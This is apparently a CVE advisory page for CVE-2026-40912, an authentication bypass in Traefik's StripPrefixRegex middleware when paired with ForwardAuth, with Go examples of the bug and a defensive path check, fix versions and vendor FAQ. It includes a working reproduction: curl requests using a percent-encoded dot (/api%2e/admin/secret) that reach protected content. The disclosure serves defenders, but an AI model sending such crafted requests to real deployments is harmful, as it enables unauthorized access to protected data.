CVE-2026-40912

CVE-2026-40912 is a high-severity security vulnerability in github.com/traefik/traefik/v3 (go), affecting versions >= 3.7.0-ea.1, < 3.7.0-rc.2. It is fixed in 3.7.0-rc.2, 3.6.14, 2.11.43.

Summary

There is a high severity authentication bypass vulnerability in Traefik's StripPrefixRegex middleware when used in combination with ForwardAuth, BasicAuth, or DigestAuth.

The middleware matches the regex against the decoded URL path but uses the resulting byte length to slice the percent-encoded raw path. When a dot (or multiple dots) appears in the prefix portion of the URL, the raw path after stripping becomes a dot-segment (e.g. /./admin/secret).

ForwardAuth receives this dot-segment path in X-Forwarded-Uri, which does not match the protected path patterns and therefore allows the request through. The backend then normalizes the dot-segment to the real path per RFC 3986 and serves the protected content.

An unauthenticated attacker can exploit this against any backend that performs dot-segment normalization.
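The length mismatch described above, as an added example that is not Traefik's code: a Go program that reproduces the slicing pattern the advisory describes (regex matched on the decoded path, the decoded match length used to slice the raw path) beside an assumed corrected variant that maps the decoded match length to the corresponding raw-path offset before slicing. The `ensureLeadingSlash` helper, the `^/[^/]+` prefix regex and the sample paths are constructed for this example; the corrected variant is one reasonable approach and is not claimed to be Traefik's actual fix.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// ensureLeadingSlash stands in for the helper named in the advisory.
// Assumed behaviour: return s unchanged if it starts with "/", else prepend one.
func ensureLeadingSlash(s string) string {
	if strings.HasPrefix(s, "/") {
		return s
	}
	return "/" + s
}

// stripByDecodedLen reproduces the pattern the advisory describes: the prefix
// regex is matched against the decoded path, and the byte length of that
// decoded match is used to slice the percent-encoded raw path.
func stripByDecodedLen(rawPath string, re *regexp.Regexp) (string, error) {
	decoded, err := url.PathUnescape(rawPath)
	if err != nil {
		return "", err
	}
	loc := re.FindStringIndex(decoded)
	if loc == nil || loc[0] != 0 {
		return rawPath, nil // no match at the start of the path: leave it alone
	}
	// loc[1] is len(prefix) in decoded bytes, applied here to the raw string.
	return ensureLeadingSlash(rawPath[loc[1]:]), nil
}

// rawOffset walks rawPath and returns the raw byte offset at which decodedLen
// decoded bytes have been consumed, counting each %XX triplet as one byte.
// rawPath is assumed to have passed url.PathUnescape, so every '%' starts a
// complete triplet.
func rawOffset(rawPath string, decodedLen int) int {
	raw := 0
	for consumed := 0; consumed < decodedLen && raw < len(rawPath); consumed++ {
		if rawPath[raw] == '%' {
			raw += 3
		} else {
			raw++
		}
	}
	return raw
}

// stripAligned is an assumed corrected variant (not Traefik's fix): it still
// matches on the decoded path, but maps the decoded match length to the
// corresponding raw offset before slicing, so Path and RawPath stay in step.
func stripAligned(rawPath string, re *regexp.Regexp) (string, error) {
	decoded, err := url.PathUnescape(rawPath)
	if err != nil {
		return "", err
	}
	loc := re.FindStringIndex(decoded)
	if loc == nil || loc[0] != 0 {
		return rawPath, nil
	}
	return ensureLeadingSlash(rawPath[rawOffset(rawPath, loc[1]):]), nil
}

func main() {
	// Constructed sample: a regex that strips the whole first segment, so the
	// decoded match ("/api.") covers the percent-encoded dot in "/api%2e".
	re := regexp.MustCompile(`^/[^/]+`)
	for _, raw := range []string{"/api%2e/admin/secret", "/api%20/admin/secret", "/api/admin/secret"} {
		byLen, _ := stripByDecodedLen(raw, re)
		aligned, _ := stripAligned(raw, re)
		fmt.Printf("%-22s by-decoded-len=%-18s aligned=%s\n", raw, byLen, aligned)
	}
}
```

The two variants only diverge when the decoded match region contains a percent-encoded byte: with the advisory's `^/api` regex both return `/%2e/admin/secret`, while a regex that consumes the whole first segment turns `/api%2e/admin/secret` into the corrupted `/2e/admin/secret` under decoded-length slicing and into `/admin/secret` under offset-aligned slicing.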

For more information

If there are any questions or comments about this advisory, please open an issue.

Original Description

StripPrefixRegex uses the byte length of a decoded Path match to slice the encoded RawPath. When percent-encoded characters are in the prefix region, this produces a wrong RawPath. ForwardAuth then receives this wrong path in X-Forwarded-Uri, sees a path that doesn't match its protection rules, and approves the request. The backend serves protected content.

Details

pkg/middlewares/stripprefixregex/strip_prefix_regex.go, line 62:

req.URL.RawPath = ensureLeadingSlash(req.URL.RawPath[len(prefix):])

prefix comes from matching the regex against the decoded req.URL.Path (line 51). len(prefix) is then used to index into the encoded req.URL.RawPath. These lengths don't match when percent-encoding is present.

Example with regex ^/api:

  • GET /api%20/admin/secret
  • Decoded Path: /api /admin/secret -> prefix = /api (4 bytes)
  • Encoded RawPath: /api%20/admin/secret -> same region is 6 bytes
  • RawPath[4:] = %20/admin/secret -> after ensureLeadingSlash -> /%20/admin/secret
  • ForwardAuth sees X-Forwarded-Uri: /%20/admin/secret -> not /admin/* -> allows it
  • Backend serves the protected admin content

PoC

Requires Docker and Docker Compose. I have a setup that runs Traefik v3.6.11 with StripPrefixRegex + ForwardAuth + a backend. It sends a normal request (blocked, 403) and an encoded request (bypasses auth, 200, returns protected data). Can share the files here if useful.

Updated PoC (reporter follow-up)

After further testing, the confirmed working exploit uses %2e (percent-encoded dot) rather than %20. Dot-segment normalization (/./ -> /) is RFC 3986 standard behavior handled automatically by Express.js, Go's http.ServeMux, Spring Boot, and others; no custom configuration is needed.

Chain:

GET /api%2e/admin/secret
-> StripPrefixRegex strips /api -> RawPath becomes /./admin/secret
-> ForwardAuth sees /./admin/secret -> does not match /admin/ -> allows
-> Express normalizes /./admin/secret -> /admin/secret -> serves protected content

Results (Traefik v3.6, unmodified Express.js express.static):

GET /api/admin/secret      -> 403 (blocked)
GET /api%2e/admin/secret   -> 200 (bypass, served protected content)
GET /api%20/admin/secret   -> 404 (space not normalized by backend)

Auth server logs:

X-Forwarded-Uri: '/admin/secret'    -> DENIED
X-Forwarded-Uri: '/./admin/secret'  -> ALLOWED

Reproduction:

docker compose up -d --build --wait
curl http://localhost:8080/api/admin/secret                       # -> 403
curl --path-as-is "http://localhost:8080/api%2e/admin/secret"     # -> 200

Impact

Auth bypass. Any path protected by ForwardAuth, BasicAuth, or DigestAuth can be accessed without credentials when StripPrefixRegex is in the same middleware chain. The attacker only needs to add a percent-encoded character to the prefix portion of the URL.
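The bypass rests on the auth server comparing the literal X-Forwarded-Uri against its protection rules while the backend serves the normalized path. As an added example (not part of the advisory, and not Traefik's or any auth server's code), the following Go program makes the forward-auth decision on the canonical path instead: it drops the query, percent-decodes, and applies RFC 3986 dot-segment removal via path.Clean before matching. The protected prefix `/admin/`, the `authorize` and `canonicalPath` functions and the sample URIs are constructed; the first two sample values are the ones shown in the auth-server log above.

```go
package main

import (
	"fmt"
	"net/url"
	"path"
	"strings"
)

// protectedPrefixes is a constructed rule set for the auth server: anything
// under these prefixes requires credentials.
var protectedPrefixes = []string{"/admin/"}

// canonicalPath turns an X-Forwarded-Uri value into the path the backend will
// actually serve: drop the query, percent-decode, then remove dot-segments
// with path.Clean, which for a rooted path gives the RFC 3986 result.
func canonicalPath(forwardedURI string) (string, error) {
	rawPath := forwardedURI
	if i := strings.IndexByte(rawPath, '?'); i >= 0 {
		rawPath = rawPath[:i]
	}
	decoded, err := url.PathUnescape(rawPath)
	if err != nil {
		return "", err // malformed escape: the caller must deny, not guess
	}
	if !strings.HasPrefix(decoded, "/") {
		decoded = "/" + decoded
	}
	cleaned := path.Clean(decoded)
	// path.Clean drops a trailing slash; keep it so "/admin/" still matches
	// the prefix rule exactly.
	if strings.HasSuffix(decoded, "/") && cleaned != "/" {
		cleaned += "/"
	}
	return cleaned, nil
}

// authorize is the forward-auth decision. Credential validation is out of
// scope here, so its outcome is passed in as authenticated; the point is that
// the rule is matched against the canonical path, never the literal URI.
func authorize(forwardedURI string, authenticated bool) (bool, string) {
	canon, err := canonicalPath(forwardedURI)
	if err != nil {
		return false, "malformed uri: " + err.Error()
	}
	for _, pfx := range protectedPrefixes {
		if canon == strings.TrimSuffix(pfx, "/") || strings.HasPrefix(canon, pfx) {
			if !authenticated {
				return false, "protected path " + canon
			}
		}
	}
	return true, canon
}

func main() {
	// Constructed X-Forwarded-Uri values; the first two are the ones shown in
	// the advisory's auth-server log.
	samples := []string{
		"/admin/secret",
		"/./admin/secret",
		"/%2e/admin/secret",
		"/%2e%2e/admin/secret",
		"/static/../admin/secret",
		"/admin/secret?download=1",
		"/%20/admin/secret",
	}
	for _, uri := range samples {
		allowed, why := authorize(uri, false)
		fmt.Printf("%-26s allowed=%-5t %s\n", uri, allowed, why)
	}
}
```

Every dot-segment spelling of the protected path (`/./`, `/%2e/`, `/%2e%2e/`, `/static/../`) canonicalizes to `/admin/secret` and is denied, and a URI that fails to decode is denied rather than passed through; `/%20/admin/secret` canonicalizes to `/ /admin/secret`, which is not under the protected prefix and, as the advisory's results show, draws a 404 from the backend anyway.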

CVE-2026-40912 has a CVSS score of 8.2 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (3.7.0-rc.2, 3.6.14, 2.11.43); upgrading removes the vulnerable code path.

Affected versions

  • github.com/traefik/traefik/v3 (>= 3.7.0-ea.1, < 3.7.0-rc.2)
  • github.com/traefik/traefik/v3 (>= 3.0.0-beta1, < 3.6.14)
  • github.com/traefik/traefik/v2 (< 2.11.43)
  • github.com/traefik/traefik (<= 1.7.34)

Security releases

  • github.com/traefik/traefik/v3 → 3.7.0-rc.2 (go)
  • github.com/traefik/traefik/v3 → 3.6.14 (go)
  • github.com/traefik/traefik/v2 → 2.11.43 (go)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

Frequently Asked Questions

  1. What is CVE-2026-40912? CVE-2026-40912 is a high-severity security vulnerability in github.com/traefik/traefik/v3 (go), affecting versions >= 3.7.0-ea.1, < 3.7.0-rc.2. It is fixed in 3.7.0-rc.2, 3.6.14, 2.11.43.
  2. How severe is CVE-2026-40912? CVE-2026-40912 has a CVSS score of 8.2 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which packages are affected by CVE-2026-40912?
    • github.com/traefik/traefik/v3 (go) (versions >= 3.7.0-ea.1, < 3.7.0-rc.2)
    • github.com/traefik/traefik/v2 (go) (versions < 2.11.43)
    • github.com/traefik/traefik (go) (versions <= 1.7.34)
  4. Is there a fix for CVE-2026-40912? Yes. CVE-2026-40912 is fixed in 3.7.0-rc.2, 3.6.14, 2.11.43. Upgrade to the fixed release for your major version line, or later.
  5. Is CVE-2026-40912 exploitable, and should I be worried? Whether CVE-2026-40912 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  6. What actually determines whether CVE-2026-40912 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-40912?
    • Upgrade github.com/traefik/traefik/v3 to 3.7.0-rc.2 or later
    • Upgrade github.com/traefik/traefik/v3 to 3.6.14 or later
    • Upgrade github.com/traefik/traefik/v2 to 2.11.43 or later
